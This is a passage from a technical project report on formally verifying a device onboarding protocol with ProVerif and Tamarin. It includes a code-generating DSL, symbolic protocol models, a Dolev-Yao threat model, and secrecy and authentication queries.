We have implemented our DSL using Langium, an open-source language engineering tool that is running on Node.js and is built on the solid foundation of Xtext's proven track record, benefiting from years of real-world deployment across numerous global projects and products. Our DSL provides predefined functions for symmetric and asymmetric encryption, message signature and verification, exponential function, and private/public keys. Moreover, it also provides built-in types such as key, bitstring, id, skey, exponent, nonce, and table. The DSL also supports queries for anonymity, forward secrecy, and mutual authentication that abstract the complexity required to define them in tools such as ProVerif. These follow the concept of functions by taking in parameters required for the query and then generating the ProVerif code.

Listing 2.1 presents the model for verifying the forward secrecy security property, while Listing 2.2 shows the DSL model for mutual authentication. It can be seen that the models use a sequential method where

each message/step is defined one after the other. This method has some similarities to Verifpal but it is in contrast with ProVerif, which requires the users to define all the steps for an actor at once, making it more difficult to understand what is the order of messages. Furthermore, Listing 2.3 and Listing 2.4 show the ProVerif code translation of the forward secrecy and mutual authentication models which match the ProVerif models extracted from the literature. For instance, line 32 from Listing 2.1 presents the method for verifying the forward secrecy properties while Listing 2.3 has this verification process in two steps. First, there is a query on line 13, and then another phase is introduced in the ProVerif model on line 43 where the secrets are leaked.

```

1 type G
2
3 G g
4 function exp(G, exponent): G
5 function pk(skey): pkey
6
7 function group2key(G): key
8
9 private bitstring m
10
11 actor P { sk: new skey, a: new exponent, g_b: new G, k: new key }
12 actor Q { sk: new skey, b: new exponent, g_a: new G, k: new key, msg:
    new bitstring }
13
14 message step1 P -> Q: sign(exp(g, P.a), P.sk)
15 Q.g_a = checksign(step1.payload[0], pk(P.sk))
16
17 message step2 Q -> P: sign(exp(g, Q.b), Q.sk)
18 P.g_b = checksign(step2.payload[0], pk(Q.sk))
19
20 if(P.g_b == g) {
21     exit
22 }
23 else {
24     P.k = group2key(exp(P.g_b, P.a))
25     message step3 P -> Q: enc(m, P.k)
26
27     Q.k = group2key(exp(Q.g_a, Q.b))
28     Q.msg = dec(step3.payload[0], Q.k)
29 }
30
31 check forward_secrecy(m, P.sk, Q.sk)

```

Listing 2.1: DSL Model Forward Secrecy

```

1 type host
2
3 function nonce_to_bitstring(nonce): bitstring
4
5 host A
6 host B
7 table keys(host, pkey)
8

```



```

9 function messtermI(host, host): bitstring
10 function messtermR(host, host): bitstring
11
12 private key skA
13 private key skB
14
15 actor Initiator {sk_A: skA, sk_B: skB}
16 actor Responder {sk_A: skA, sk_B: skB}
17 actor S {skS: new key}
18 actor K {}
19
20 insert keys(A, pk(S.sk_A))
21 insert keys(B, pk(S.sk_B))
22
23 message step1 Initiator -> S: A, B
24 S.a = step1.payload[0]
25 S.b = step1.payload[1]
26 S.sb = get keys(S.b)
27
28 message step2 S -> Initiator: sign((S.sb, S.b), S.skS)
29 Initiator.pkX, (=B) = checksign(step2.payload[0], pk(S.skS))
30 Initiator.Na = new nonce
31 Initiator.m3 = aenc((Initiator.Na, A), Initiator.pkX)
32
33 message step3 Initiator -> Responder: Initiator.m3
34 Responder.NY, Responder.hostY = adec(step3.payload[0], Responder.sk_B)
35
36 message step4 Responder -> S: A, Responder.hostY
37 S.a = step4.payload[0]
38 S.b = step4.payload[1]
39
40 message step5 S -> Responder: sign((S.sb, S.b), S.skS)
41 Responder.pkY, (=A) = checksign(step2.payload[0], pk(S.skS))
42 Responder.Nb = new nonce
43 Responder.m6 = aenc((Responder.NY, Responder.Nb, A), Responder.pkY)
44
45 message step6 Responder -> Initiator: Responder.m6
46 (=Initiator.Na), Initiator.NX2, (=A) = adec(step6.payload[0],
    Responder.sk_A)
47 Initiator.m7 = aenc(Initiator.NX2, Initiator.pkX)
48
49 message step7 Initiator -> Responder: Initiator.m7
50 Responder.m_adec = adec(step7.payload[0], Responder.sk_B)
51 if(Responder.Nb != Responder.m_adec)
52 {
53     exit
54 }

```

Listing 2.2: DSL Model Mutual Authentication

1 (* Predefined functions *)


```

2 fun exp(G, exponent): G.
3 equation forall x: exponent, y: exponent;
4   exp(exp(g, x), y) = exp(exp(g, y), x).
5 fun pk(skey): pkey.
6 fun sign(bitstring, skey): bitstring.
7 reduc forall m: bitstring, sk: skey;
8   checksign(sign(m, sk), pk(sk)) = m.
9 fun enc(bitstring, key): bitstring.
10 reduc forall m: bitstring, k: key;
11   dec(enc(m, k), k) = m.
12 (* Queries *)
13 query attacker(m).
14 (* Processes *)
15 let P(sk: skey, a: exponent, g_b: G, k: key, pk_Q: pkey) =
16   out(c, (sign(exp(g, a), sk)));
17   in(c, (sign_msg: bitstring));
18   let (g_b: G) = checksign(sign_msg, pk_Q) in
19   if (g_b = g) then
20     0
21   else
22     let (k: key) = group2key(exp(g_b, a)) in
23     out(c, (enc(m, k)));
24     0.
25 let Q(sk: skey, b: exponent, g_a: G, k: key, msg: bitstring, pk_P:
    pkey) =
26   in(c, (sign_msg: bitstring));
27   let (g_a: G) = checksign(sign_msg, pk_P) in
28   out(c, (sign(exp(g, b), sk)));
29   in(c, (enc_msg: bitstring));
30   let (k: key) = group2key(exp(g_a, b)) in
31   let (msg: bitstring) = dec(enc_msg, k) in
32   0.
33 process
34   new sk_P: skey;
35   new a_P: exponent;
36   new g_b_P: G;
37   new k_P: key;
38   new sk_Q: skey;
39   new b_Q: exponent;
40   new g_a_Q: G;
41   new k_Q: key;
42   new msg_Q: bitstring;
43   P(sk_P, a_P, g_b_P, k_P, pk(sk_Q)) | Q(sk_Q, b_Q, g_a_Q, k_Q, msg_Q,
    pk(sk_P)) | phase 1; out(c, (sk_P, sk_Q))

```

Listing 2.3: DSL ProVerif free c: channel. type id. type key. type skey. type pkey. type nonce. type exponent. type G. (* Custom Declaration *) const g: G. fun group2key(G): key. const m: bitstring [private

```

1 free c: channel.
2 type id.
3 type key.

```



```

4 type skey.
5 type pkey.
6 type nonce.
7 type exponent.
8 type host.
9 (* Custom Declaration *)
10 fun nonce_to_bitstring(bitstring): bitstring.
11 const A: host.
12 const B: host.
13 table keys(host, pkey).
14 fun messtermI(host, host): bitstring.
15 fun messtermR(host, host): bitstring.
16 const skA: skey [private].
17 const skB: skey [private].
18 (* Predefined functions *)
19 fun pk(skey): pkey.
20 fun sign(bitstring, skey): bitstring.
21 reduc forall m: bitstring, sk: skey;
22   checksign(sign(m, sk), pk(sk)) = m.
23 fun aenc(bitstring, pkey): bitstring.
24 reduc forall m: bitstring, k: skey;
25   adec(aenc(m, pk(k)), k) = m.
26 (* Queries *)
27 (* Processes *)
28 let Initiator(sk_A: skey, sk_B: skey, pk_S: pkey) =
29   out(c, (A, B));
30   in(c, (sign_msg: bitstring));
31   let (pkX: pkey, =B) = checksign(sign_msg, pk_S) in
32   new new_bitstring: bitstring;
33   let (Na: bitstring) = new_bitstring in
34   let (m3: bitstring) = aenc((Na, A), pkX) in
35   out(c, (m3));
36   in(c, (m6: bitstring));
37   let (=Na, NX2: bitstring, =A) = adec(m6, sk_A) in
38   let (m7: bitstring) = aenc(NX2, pkX) in
39   out(c, (m7));
40   0.
41 let Responder(sk_A: skey, sk_B: skey, pk_S: pkey) =
42   in(c, (m3: bitstring));
43   let (NY: bitstring, hostY: host) = adec(m3, sk_B) in
44   out(c, (A, hostY));
45   in(c, (sign_msg: bitstring));
46   let (pkY: pkey, =A) = checksign(sign_msg, pk_S) in
47   new new_bitstring: bitstring;
48   let (Nb: bitstring) = new_bitstring in
49   let (m6: bitstring) = aenc((NY, Nb, A), pkY) in
50   out(c, (m6));
51   in(c, (m7: bitstring));
52   let (m_adec: bitstring) = adec(m7, sk_B) in
53   if (Nb <> m_adec) then

```



```

54 0.
55 let S(skS: skey) =
56   in(c, (A: host, B: host));
57   let (a: host) = A in
58   let (b: host) = B in
59   get keys(b, sb) in
60   out(c, (sign((sb, b), skS)));
61   in(c, (A: host, hostY: host));
62   let (a: host) = A in
63   let (b: host) = hostY in
64   out(c, (sign((sb, b), skS)));
65 0.
66 let K(pk_S: pkey) =
67 0.
68 process
69 let sk_A_Initiator: skey = skA in
70 let sk_B_Initiator: skey = skB in
71 let sk_A_Responder: skey = skA in
72 let sk_B_Responder: skey = skB in
73 new skS_S: skey;
74 Initiator(sk_A_Initiator, sk_B_Initiator, pk(skS_S)) | Responder(
    sk_A_Responder, sk_B_Responder, pk(skS_S)) | S(skS_S) | K(pk(skS_S))
    )

```

Listing 2.4: DSL ProVerif Translation Mutual Authentication

2.3 Threat Model

The goal of this section is to define the adversarial model (as defined in D3.2 [25]) used in the verification of the ZTO process. Furthermore, it includes the assumptions used to model it and defines the security properties based on the requirements.

The threat model is defined based on the well-known Dolev-Yao model [21]. This approach assumes an active adversary who intercepts all communications between security protocol participants and attempts to extract sensitive information through any available means. We employ the Dolev-Yao threat model, which grants the attacker several capabilities such as capturing any message transmitted over the network, initiating protocol sessions as a legitimate participant, and serving as a communication endpoint for any protocol actor. However, the Dolev-Yao model operates exclusively at the network layer, meaning the adversary cannot directly compromise data or cryptographic keys stored on individual devices.

The Dolev-Yao model encompasses several well-established attack scenarios commonly used in protocol security verification. Among the most prevalent are replay and man-in-the-middle (MITM) attacks, both integral to the Dolev-Yao threat model. These types of attacks can be analyzed using automated tools like ProVerif and Tamarin. In a replay attack, an adversary captures and reuses transmitted data to exploit vulnerabilities, potentially gaining access to sensitive information or unauthorized privileges. In contrast, a MITM attack involves an attacker intercepting and potentially altering the communication between two parties.

There are two main security requirements that we are focusing on throughout the ZTO: confidentiality, integrity, and authentication and authorization (as defined in Table 2.1). Confidentiality ensures that an

attacker cannot obtain the secrets of the participants of ZTO. This is also often referred to as the secrecy property. In the ZTO, we need to check that the secret keys of the device, DM, or Privacy CA are not leaked during the onboarding process. Furthermore, integrity ensures that only authenticated and uncompromised high-end and low-end devices are allowed access to the attestation keys of their Trusted Components (TCs) to generate valid attestations [26]. Authorization and authentication ensure that only devices with valid attributes can use valid attestation keys.

2.4 Zero-Touch Onboarding

This section aims to describe the formal verification process of the **Zero-Touch Onboarding (ZTO)** scheme of ENTRUST. To this end, we first present sequence diagrams for each separate phase of the ZTO scheme, and we then describe how the various internal functions are modelled in ProVerif and Tamarin.

In general, the ZTO scheme can be split into two core phases, the **authentication** and the **enrolment**. The core objective of the authentication phase is the issuance of the **Verifiable Credentials (VCs)** of the device, so that they can then be used for providing proof of ownership of the required attributes during the enrolment phase, through the construction of the appropriate **Verifiable Presentation (VP)** containing these attributes. This VP will be presented and verified during the enrolment phase, where all crypto primitives needed for the operation of the security enablers of ENTRUST will be created, including the **Attestation Key (AK)**. The AK is then utilized by the TAF to generate a conformity certificate, after a trust assessment process has been performed on the device. Note that the formal verification of the process for the generation of the VCs has already been performed and documented in Deliverable D3.2 [25].

2.4.1 Security Properties

In Table 2.1, we provide the list of security properties that need to be verified in order to formally verify the correctness of the ZTO scheme, and will provide the basis for the evaluation activities to be outlined throughout this Chapter. Specifically, these properties are evaluated against the identified threat model, considering both passive and active attackers.

Security Property	Description
Confidentiality of Secret Key	Considering a secret key k , this property ensures that the attacker cannot obtain k . In the context of ENTRUST, this ensures that the secret keys of the device, Domain Manager, and Privacy CA are not leaked to an attacker. In the context of ENTRUST, this refers to the Domain Key which is used in order to encrypt the attribute-based policy generated by the Domain Manager. The Domain Key is also used in the Attribute-Based Signcryption (ABSC) process, as will be outlined in the following.
Confidentiality of Protocol State Values	Confidentiality applies to a piece of data m , such as a protocol state value. This property ensures that the attacker cannot obtain m . Protects internal protocol values such as random nonces (f , r) and derived values (Z) based on which the attribute values and keys per device are generated, and the Message Authentication Code (T). Ensures these cannot be observed or inferred by an attacker.

Integrity and Freshness	<p>Ensures the integrity and authenticity of a transmitted message, and that the message is not used outside of its intended session. The latter is referred to as freshness and applies to a piece of data m, assuming the possibility of multiple protocol session. Thus, m cannot be reused in multiple executions by the attacker, since m depends on information that is freshly generated at each execution. In the context of ENTRUST, this property verifies that the Message Authentication Code (MAC) (T) sent by the device can only be accepted by the Domain Manager if the key material used to compute it is valid. In ENTRUST, this property also applies especially to the attribute-based policy generated by the Domain Manager, under which the Domain Key is encrypted. This datum is used for initiating a fresh ABSC process as part of the enrolment phase based on which, if the device is able to exhibit these attributes through a VP, it is able to have access to and use this key.</p>
Authorization and Authentication	<p>Applies to a message m sent from a sender S to a recipient R. In this regard, R should be able to use m in an operation, such as for signature verification or authenticated decryption, if and only if R received m from S. In the context of ENTRUST, this property guarantees that only devices with valid attributes and uncompromised keys can derive a correct MAC and trigger a successful run of the protocol. This is partially enforced through the Key Restriction Usage Policies managed by the underlying Trusted Component for predicating access to the attestation capabilities (AK) of the device to only authenticated host processes. This can also be seen as an instance of freshness as, in the context of ENTRUST, this also means that the VP presented during the enrolment phase (as mentioned in the Integrity and Freshness field) must be fresh.</p>
Unforgeability	<p>Guarantees that no other entity besides the one that holds the appropriate secret keys can generate a signature that can be successfully verified. In the context of ENTRUST, it is important that only the holder device of the credential with the attribute-based keys can generate a valid VP containing the appropriate attributes, as previously outlined.</p>

Table 2.1: Security Properties Verified in the ZTO Protocol

2.4.2 Sequence Diagrams

In this section, we provide sequence diagrams for all the sub-phases comprising the ZTO process of ENTRUST. These will provide the basis for the modelling of this process so that it can be analysed by the Formal Verification component leveraging both ProVerif and Tamarin, and verify that all overarching requirements are fulfilled and the required security properties are correct.

2.4.2.1 Enrolment High-End Device

Figure 2.2 shows the enrolment process for high-end devices. The sequence diagram represents the *High-End Device Enrolment* scheme presented in Deliverable D4.2 [REF]. Moreover, the scheme serves as a basis for developing the ProVerif and Tamarin models to formally verify the security requirements. The phase starts with a request from the high-end device that contains its public key. Then, the Privacy CA generates a random value and uses the *setup* function on line 29 from Listing 2.5 to setup the attribute keys of the device. Furthermore, the Privacy CA bounds the domain key and the attribute key to the root of the device key and sends it to the DM. The DM uses the function *derivePolicies* (line 8) to generate the policies that are used to start the signcryption process. The DM encrypts the bounded domain key using the *signcrypt* function (line 35) using its secret keys under the derived policy. The encrypted message is sent to the device, where it uses the *designcrypt* function (line 38) to verify the signature of the DM and retrieve the message. In ProVerif, we model this as a reduction rule, often used to model encrypt/decrypt processes in such verification tools, based on the definition of the Attribute-Based Signcryption scheme defined in Deliverable D4.2. The device generates its attestation key using the function *g* (line 2), concatenates it with its public part of the Root Key, and sends it to the DM. The DM then creates a shared symmetric key that is derived from the device attestation key and domain key

using the Key Derivation Function KDF (line 11). The device then uses this key to create a symmetric signature T using the MAC function (line 5) and sends it to the DM. Upon successful verification of T , by computing its signature and comparing the values, proceeds with creating the credential for the Trusted Component Attestation Key as in Figure 2.3.

Figure 2.2: Enrolment High End Device

2.4.2.2 Attestation Key Credentials Issuance

Figure 2.3 presents the process that issues the attestation key credentials that are used by the device whenever it needs to generate attestations. First, the device computes the attestation key similarly as in the enrolment phase, then it uses the *sign* function (line 84) to sign the attestation key using its public key and sends it to the DM. The DM verifies the validity of the message using the *checksign* function (line 87)

that is modeled as a reduction rule. The DM generates the domain attributes of the device, signs them to create the credentials *CRED*, and encrypts them using the asymmetric encryption function *senc* (line 20). Then, the DM sends the credentials to the device, where they are verified by decrypting the message using the decryption function *sdec* (line 23), which is again modeled as a reduction rule. Furthermore, the signature of the credentials is verified. Upon successful verification, the device stores the credentials and uses them to generate attestations when needed.

Figure 2.3: Enrolment - Attestation Key Credentials Issuance

2.4.2.3 Attribute Keys Issuance

In the enrolment phase, the first step of the Privacy CA is to issue attribute keys for the device. The process of generating attribute keys is presented in more detail in Figure 2.4. Since we cannot model a dynamic set of attributes for the device, we abstract the process by only using one attribute per device. First, the Privacy CA uses the *selectAttribute* (line 66) function to assign an attribute and send it to the device. Then, the device signs it under its root key using the *sign* function (line 51) and sends it to the Privacy CA to verify the integrity of the message using the *checksign* function (line 54), which is a reduction rule. Furthermore, the Privacy CA computes the attribute using the function *computeAttrKey* (line 69) to bind the attribute to the device root key, which prevents sharing of attributes between devices.

2.4.2.4 Enrolment Low-End Device

The low-end device enrolment scheme has two main phases. The first phase is the enrolment, where the manufacturer verifies the signature of the device. The second one, post-enrolment, aims to generate the conformity certificate of the device. In the first phase, the device sends an enrolment request to the DM that contains its unique ID and the public part of its verifiable credentials. The DM generates and challenge and sends it to the device. The device concatenates the verifiable credentials with the

Figure 2.4: Enrolment - Attribute Keys Issuance

challenge and signs them with the private part of the verifiable credentials using the *hmac* function (line 48). The DM receives the signed challenge and forwards it to the manufacturer along with the device ID, verifiable credentials, and the initial challenge. The manufacturer knows the private part of the verifiable credentials and takes the same steps to compute the signed challenge using the *hmac* function. Then, it compares the two signed challenges and completes the enrolment phase of the device by sending a success message to the DM.

Upon successful verification of the device’s verifiable credentials, the DM notifies the TAF by sending the device ID and attributes. The TAF generates a challenge and sends it to the manufacturer. The manufacturer uses the PUF outputs to derive the private keys by applying a key derivation function *KDF* (line 11) that takes two bitstrings and produces a key. The public keys of the generated private keys are created and sent back to the TAF, which generates one-time public keys corresponding to PUF outputs received.

2.4.2.5 ProVerif Code

Listing 2.5 presents an overview of ProVerif functions that represent the cryptographic operations for all schemes described in this section.

```

1 (* g: Hash-like function, maps a bitstring to a bitstring. *)
2 fun g(bitstring): bitstring.
3
4 (* MAC: Computes a Message Authentication Code from a bitstring and a
   key. *)
5 fun MAC(bitstring, key): bitstring.

```


Figure 2.5: Enrolment Low End Device - Enrolment Phase

```

6
7 (* derivePolicies: Derives a policy from a public key and a bitstring. *)
8 fun derivePolicies(pk, bitstring): policy.
9
10 (* KDF: Key Derivation Function, derives a key from two bitstrings. *)
11 fun KDF(bitstring, bitstring): key.
12
13 (* pk: Derives a public key from a secret key. *)
14 fun pk(skey): pkey.
15
16 (* power: Cryptographic power operation between two bitstrings. *)
17 fun power(bitstring, bitstring): bitstring.
18
19 (* senc: Encrypts a bitstring with a public key. *)
20 fun senc(bitstring, pkey): bitstring.
21
22 (* Decryption rule: Decrypt senc(x, pk(y)) with y yields x. *)
23 reduc forall x: bitstring, y: skey; sdec(senc(x, pk(y)), y) = x.
24
25 (* Converts a bitstring into a secret key. *)
26 fun bitstringToSkey(bitstring): skey.
27

```


Figure 2.6: Enrolment Low End Device - Post-Enrolment Phase

```

28 (* Initializes an attribute key from a bitstring. *)
29 fun setup(bitstring): attributeKey.
30
31 (* Binds a domain key to a public key, bitstring, and attribute key. *)
32 fun boundDomainKey(pkey, bitstring, attributeKey): bitstring.
33
34 (* signcrypt: Signcrypts a bitstring with a secret key under a policy. *)
35 fun signcrypt(bitstring, policy, skey): bitstring.
36
37 (* Decryption rule: Decrypts signcrypt(m, p, sk_s) to recover m. *)
38 reduc forall m: bitstring, sk_d: bitstring, sk_s: skey, p: policy, S:
    attributeSet;
39   designcrypt(sk_d, signcrypt(m, p, sk_s), S) = m.
40

```



```

41 (* Power commutativity: power(g(x), y) = power(g(y), x). *)
42 equation forall x: bitstring, y: bitstring; power(g(x), y) = power(g(y
    ), x).
43
44 (* pk: Derives a public key from another key. *)
45 fun pk(key): key.
46
47 (* hmac: Computes HMAC of a bitstring with a key. *)
48 fun hmac(bitstring, key): bitstring.
49
50 (* sign: Signs a bitstring with a key. *)
51 fun sign(bitstring, key): bitstring.
52
53 (* Signature verification rule: Validates a signature and recovers the
    message. *)
54 reduc forall m: bitstring, sk: key; checksign(sign(m, sk), pk(sk)) = m
    .
55
56 (* h: Hash function, e.g., for Merkle trees or general use. *)
57 fun h(bitstring): bitstring.
58
59 (* ots_keygen: One-Time Signature key generation. *)
60 fun ots_keygen(key, bitstring): key.
61
62 (* mpk: Creates a Merkle Public Key from a root key. *)
63 fun mpk(key): bitstring.
64
65 (* Generates a random attribute. *)
66 fun selectAttribute(): attribute.
67
68 (* Computes an attribute key from an attribute. *)
69 fun computeAttrKey(attribute): attributeKey.
70
71 (* Signature verification rule for attributes. *)
72 reduc forall m: attribute, sk: skey; checksign(sign(m, sk), pk(sk)) =
    m.
73
74 (* Converts a public key to a bitstring. *)
75 fun pkToBitstring(pkey): bitstring.
76
77 (* Converts an attestation key into a secret key. *)
78 fun akToKey(attestationKey): skey.
79
80 (* g: Maps an attestation key to a public key. *)
81 fun g(attestationKey): pkey.
82
83 (* sign: Signs a bitstring using a secret key. *)
84 fun sign(bitstring, skey): bitstring.
85
86 (* Signature verification rule for secret key signatures. *)

```



```
87 reduc forall m: bitstring, sk: skey; checksign(sign(m, sk), pk(sk)) =
    m.
```

Listing 2.5: ProVerif Functions

2.4.2.6 Tamarin Code

The following code is the Tamarin specification of the ZTO for low-end devices. There are two properties that are checked: honesty that checks if the protocol can run until its end (line 111, this is a simple sanity check) and the secrecy of the generated private key (line 114).

```
1 theory OnboardingLowEnd
2 begin
3
4 functions: pair/2, first/1, second/1, hmac/2, verifyPKinVC/2, true/0, kdf/2, ots_keygen/2,
    mpk/1, sign/2, verifysign/2, decryptsign/2
5 builtins: hashing, signing
6 equations: first(pair(a, b)) = a, second(pair(a, b)) = b, verifyPKinVC(pubk, vc) = true,
    verifysign(sign(m, sk), pk(sk)) = true, decryptsign(sign(m, sk), pk(sk)) = m
7
8 //pre-shared keys infra
9 rule Register_vc_key:
10   [Fr(~skR)]
11 -->
12   [!Ltk('d', ~skR), !Pk('d', pk(~skR)), Out(pk(~skR))]
13
14 rule Register_TAF_key:
15   [Fr(~skR)]
16 -->
17   [!Ltk('taf', ~skR), !Pk('taf', pk(~skR)), Out(pk(~skR))]
18
19 //verifiable credential device
20 rule VC_device:
21   [Fr(~vc)]
22 -->
23   [!VC('d', ~vc)]
24
25 //step1
26 rule D_1:
27   [!Pk('d', pkVC)]
28 -->
29   [Out(<'dm', $ID, pkVC>)]
30
31 //step2
32 rule DM_1:
33   [In(<'dm', devId, pkVC>), Fr(~nonce)]
34 -->
35   [Out(<'d', ~nonce>), DM_1(devId, pkVC, ~nonce)]
36
37 //step3
38 rule D_2:
39   let
40     concat = pair(vc, nonce)
```



```

41   sigVC = hmac(concat, skVC)
42   in
43   [In(<'d', nonce>), !VC('d', vc), !Ltk('d', skVC)]
44 -->
45   [Out(<'dm', vc, sigVC>), D_2(nonce)]
46
47 //step4
48 rule DM_2:
49   [In(<'dm', vc, sigVC>), DM_1(devId, pkVC, nonce)]
50 -->
51   [Out(<'m', devId, vc, sigVC, nonce>), DM_2(devId, pkVC, nonce, vc)]
52
53 //step5
54 rule M_1:
55   let
56     concat = pair(vc, nonce)
57   in
58   [In(<'m', devId, vc, hmac(concat, skVC), nonce>), !Ltk('d', skVC), !Pk('d', pkVC)]
59 --[Eq(verifyPKinVC(pkVC, vc), true)]->
60   [Out(<'dm', true, pkVC>)]
61
62 //step6
63 rule DM_3:
64   [In(<'dm', true, pkVC1>), DM_2(devId, pkVC, nonce, vc), Fr(~attr)] // just a single
    device attribute
65 -->
66   [Out(<'taf', devId, ~attr>), DM_3(devId, pkVC, ~attr)]
67
68 //step7
69 rule TAF_1:
70   [In(<'taf', devId, attr>), Fr(~c)]
71 -->
72   [Out(<'m', devId, ~c>), TAF_1(devId, attr, ~c)]
73
74 //step8
75 rule M_2:
76   let
77     prvk = kdf(c, ~pufResponse)
78     otsPrivateKey = prvk
79     otsPublicKey = ots_keygen(prvk, ~state)
80   in
81   [In(<'m', devId, c>), Fr(~pufResponse), Fr(~state)]
82 --[PKGenerated(prvk)]->
83   [Out(<'taf', otsPublicKey, devId>)]
84
85 //step9
86 rule TAF_2:
87   let
88     mpk_val = mpk(otsPublicKey)
89     cc_content = h(<mpk_val, attr, devId>)
90     cc_signature = sign(cc_content, skTaf)
91   in
92   [In(<'taf', otsPublicKey, devId>), TAF_1(devId, attr, ~c), !Ltk('taf', skTaf)]

```



```

93 -->
94   [Out(<'dm', <cc_content, cc_signature>, mpk_val, cc_signature>)]
95
96 //step10
97 rule DM_4:
98   [In(<'dm', <h(<mpk_val, attr, devId>), cc_signature>, mpk_val, cc_signature>), DM_3(devId
99     , pkVC, attr), !Pk('taf', pkTaf)]
100  --[Eq(verifysign(cc_signature, pkTaf), true)]->
101   [Out(<'d', <h(<mpk_val, attr, devId>), cc_signature>, mpk_val>)]
102
103 //step11
104 rule D_3:
105   [In(<'d', cc, mpk_val>)]
106  --[Success()]->
107   []
108
109 restriction Equality:
110 All x y #i. Eq(x, y) @#i ==> x = y
111
112 lemma honest: // the protocol can run to the end
113 exists-trace Ex #i. Success() @ #i
114
115 lemma prv_k_secret:
116 not(Ex k #i #j. PKGenerated(k) @ #i & K(k) @ #j)
117
118 end

```

Listing 2.6: Tamarin code for ZTO of low-end device

The following listing shows the Tamarin model for the ZTO of high-end device. Again, we check the honesty (protocol runs to the end) of the protocol (line 114). Apart from that, three other properties (see Table 2.1) are checked: the secrecy of the root key (line 105), the secrecy of the random number r generated in line 74 (line 108), and the secrecy of the shared key created as a result of the Diffie-Hellman exchange (line 111).

```

1 theory EnrolmentHighEnd
2 begin
3
4 functions: setup/1, boundDomainKey/3, derivePolicies/2, signcrypt/3, verifySigncrypt/3,
5   MAC/2, KDF/2, designcrypt/3, true/0, pair/2, first/1, second/1, keygen_e/2, keygen_s/2
6 builtins: signing, asymmetric-encryption, diffie-hellman
7 equations:
8 designcrypt(keygen_e(msk, a), signcrypt(m, p, keygen_s(msk, a)), a) = m, verifySigncrypt
9   (keygen_e(msk, a), signcrypt(m, p, keygen_s(msk, a)), a) = true,
10 first(pair(a, b)) = a, second(pair(a,b)) = b
11
12 //attribute signcrypt infra
13 rule Signcrypt_infra:
14   [Fr(~msk)]
15
16 -->
17   [!SKE(keygen_e(~msk, 'a')), !SKS(keygen_s(~msk, 'a'))]
18
19 //pre-shared keys infra
20 rule Register_root_key:

```



```

18 [Fr(~skR)]
19 -->
20 [!Ltk('d', ~skR), !Pk('d', pk(~skR)), Out(pk(~skR))]
21
22 rule Register_DM_keys:
23 [Fr(~skC)]
24 -->
25 [!Ltk('dm', ~skC), !Pk('dm', pk(~skC)), Out(pk(~skC))]
26
27 //step1
28 rule D_1:
29 [!Pk('d', pkR)]
30 -->
31 [Out(<'dm', pkR>)]
32
33 //step2
34 rule DM_1:
35 [In(<'dm', pkR>)]
36 -->
37 [Out(<'ca', pkR>), DM_1(pkR)]
38
39 //step3
40 rule CA_1:
41 let
42   attrKey = setup(~r)
43   bdk = boundDomainKey(pkR, ~dk, attrKey)
44 in
45 [In(<'ca', pkR>), Fr(~r), Fr(~dk), !Pk('dm', pkDM)]
46 -->
47 [Out(<'dm', bdk>)]
48
49 //step4
50 rule DM_2:
51 let
52   policies = derivePolicies(pkR, bdk)
53 in
54 [In(<'dm', bdk>), DM_1(pkR), !SKS(sKS)]
55 -->
56 [Out(<'d', signcrypt(bdk, policies, sKS)>), DM_2(bdk, pkR)]
57
58 //step5
59 rule D_2:
60 let
61   F = 'g'~f
62   bdk = designcrypt(skD, sM, 'a')
63 in
64 [In(<'d', sM>), Fr(~f), !SKE(skD), !Pk('d', pkR), !Pk('dm', cpk)]
65 --[Eq(verifySigncrypt(skD, sM, 'a'), true)]->
66 [Out(<'dm', aenc(pair(F, pkR), cpk)>), D_2(~f, bdk)]
67
68 //step6
69 rule DM_3:
70 let

```



```

71   F = first(adec(m, skC))
72   H = 'g' ^ ~r
73   in
74   [In(<'dm', m>), Fr(~r), DM_2(bdk, pkR), !Ltk('dm', skC)]
75 -->
76   [Out(<'d', aenc(pair(H, bdk), pkR)>), DM_3(bdk, pkR, ~r, F, H)]
77
78 //step7
79 rule D_3:
80   let
81     dm = adec(m, skR)
82     H = first(dm)
83     bdk2 = second(dm)
84     Z = H ^ f
85     k = KDF(Z, bdk)
86     T = MAC(H, k)
87   in
88   [In(<'d', m>), D_2(f, bdk), !Ltk('d', skR)]
89 --[SharedSecret_D(k)]->
90   [Out(<'dm', T>)]
91
92 //step8
93 rule DM_4:
94   let
95     Z = F ^ r
96     k = KDF(Z, bdk)
97   in
98   [In(<'dm', MAC(H, k)>), DM_3(bdk, pkR, r, F, H), !Ltk('d', skR)]
99 --[Success(skR), SharedSecret_DM(k), R(r)]->
100  []
101
102 restriction Equality:
103 All x y #i. Eq(x, y) @ #i ==> x = y
104
105 lemma root_key_secretcy:
106 not(Ex rk #i #j. Success(rk) @ #i & K(rk) @ #j)
107
108 lemma r_secretcy:
109 not(Ex r #i #j. R(r) @ #i & K(r) @ #j)
110
111 lemma k_d_secretcy:
112 not(Ex k #i #j. SharedSecret_D(k) @ #i & K(k) @ #j)
113
114 lemma honest: // the protocol can run to the end
115 exists-trace Ex rk #i. Success(rk) @ #i
116
117 end

```

Listing 2.7: Tamarin code for ZTO of high-end device

2.4.3 Results

2.4.3.1 ProVerif Models

```

1 (* Queries to check security properties for high end device enrolment
   *)
2 (* Check if the attacker can obtain these values *)
3 query attacker(rk).
4 query attacker(k).
5
6 (* Check if the values are kept secret *)
7 query secret csk.
8 query secret k.
9 query secret Z.
10 query secret f.
11 query secret r.
12 query secret rk.
13 query secret T.
14
15 (* Check if the success event occurs *)
16 query event(success()).
17 query event(failed()).
18
19
20 (* Queries to check security properties for low end device enrolment
   *)
21 query attacker(privateKeys).
22 event check().
23 query event(check()).
24
25
26 (* Queries to check security properties for attribute key issuance *)
27 query event(receivedAttrKey()).
28
29 query attacker(rsk).
30 query attacker(sk_CA).
31
32 (* Queries to check security properties for attestation key
   credentials issuance *)
33 query event(check()).
34 query attacker(rsk).
35 query attacker(csk).
36 query attacker(f).

```

Listing 2.8: ProVerif Queries

The queries defined in Listing 2.8 are used to verify the low-end and high-end ZTO, as well as attribute key issuance, and attestation key credentials issuance. These queries aim to verify the confidentiality of the secret keys of the device, DM, and Privacy CA (as defined in Section 2.4.1). The integrity is checked by verifying that only authorized devices can access the attestation keys of their TCs, for example, the MAC the Message Authentication Code (MAC) T can only be accepted by the DM if the key material used to compute it is valid. The queries also check that the secret parts used to derive the correct MAC are not compromised by verifying their secrecy and ensuring that the authorization and authentication properties

hold.

